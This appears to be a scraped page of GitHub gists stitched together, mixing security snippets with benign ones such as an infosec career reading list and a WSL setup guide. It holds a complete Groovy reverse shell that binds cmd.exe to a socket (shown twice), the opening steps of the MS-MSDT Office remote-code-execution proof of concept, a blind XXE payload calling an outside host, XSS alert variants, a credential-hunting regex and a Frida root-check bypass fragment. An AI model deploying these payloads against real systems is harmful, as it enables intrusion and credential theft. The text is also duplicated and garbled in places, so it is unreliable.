Abdillah Hasny abdilahrf

## ms-msdt.MD

      
              1 file
            
          
              56 forks
            
          
              24 comments
            
          
              154 stars
            
          
                tothi
                / ms-msdt.MD
            
            
              Last active
              April 18, 2024 02:22
            
              
                The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process
              
          
    MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).
The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).
Here are the steps to build a Proof-of-Concept docx:

Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.


## revsh.groovy
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

## Generic keys
(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k

## alert.js
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:

// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);

## infosec_newbie.md

      
              1 file
            
          
              118 forks
            
          
              24 comments
            
          
              653 stars
            
          
                mubix
                / infosec_newbie.md
            
            
              Last active
              April 7, 2024 22:35
            
              
                How to start in Infosec
              
          
How to Build a Successful Information Security Career (Daniel Miessler)

https://danielmiessler.com/blog/build-successful-infosec-career/#gs.DtVCbbw


The First Steps to a Career in Information Security (Errata Security - Marisa Fagan)

http://blog.erratasec.com/2010/04/first-steps-to-career-in-information.html#.WFrbofkrIuU


Hiring your first Security Professional (Peerlyst - Dawid Balut)

https://www.peerlyst.com/posts/hiring-your-first-security-professional-dawid-balut


How to Start a Career in Cyber security

https://www.concise-courses.com/security/how-to-start-your-career/


How to Get Into Information Security (ISC^2)
https://www.isc2.org/how-to-get-into-information-security.aspx


## XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

## -setup-windows-wsl-devenv.md

      
              1 file
            
          
              35 forks
            
          
              20 comments
            
          
              212 stars
            
          
                leodutra
                / -setup-windows-wsl-devenv.md
            
            
              Last active
              April 5, 2024 23:44
            
              
                Install and Setup Windows Subsystem 2 for Linux, Hyper, ZSH + Oh My Zsh + Powerlevel9k + plugins, FNM + VSCode (+ext) and Nerd Font 
              
          
    Setup Windows Subsystem 2 for Linux

Windows Subsystem 2 for Linux, Hyper, ZSH + Oh My Zsh + Powerlevel9k + plugins, FNM + VSCode (+ext) and Nerd Font

To setup native Linux, see this gist


Requirements


## frida-tips.md

      
              1 file
            
          
              6 forks
            
          
              2 comments
            
          
              44 stars
            
          
                daniellimws
                / frida-tips.md
            
            
              Last active
              April 5, 2024 21:56
            
              
                Frida tips
              
          
    Frida Tips

The documentation is so limited. A compilation of things I found on StackOverflow and don't want to have to search it up again.
Bypass root check

setTimeout(function() { // avoid java.lang.ClassNotFoundException

  Java.perform(function() {

    // Root detection bypass example

  
## waybackurls.py
import requests
import sys
import json


def waybackurls(host, with_subs):
    if with_subs:
        url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host
    else:
        url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host

## Filename extension list
.php
.html
.txt
.htm
.aspx
.asp
.js
.css
.pgsql.txt
.mysql.txt
	String host="localhost";
	int port=8044;
	String cmd="cmd.exe";
	Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
	// How many ways can you alert(document.domain)?
	// Comment with more ways and I'll add them :)
	// I already know about the JSFuck way, but it's too long to add (:

	// Direct invocation
	alert(document.domain);
	(alert)(document.domain);
	al\u0065rt(document.domain);
	al\u{65}rt(document.domain);
	window['alert'](document.domain);
	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>
	import requests
	import sys
	import json


	def waybackurls(host, with_subs):
	if with_subs:
	url = 'http://web.archive.org/cdx/search/cdx?url=.%s/&output=json&fl=original&collapse=urlkey' % host
	else:
	url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host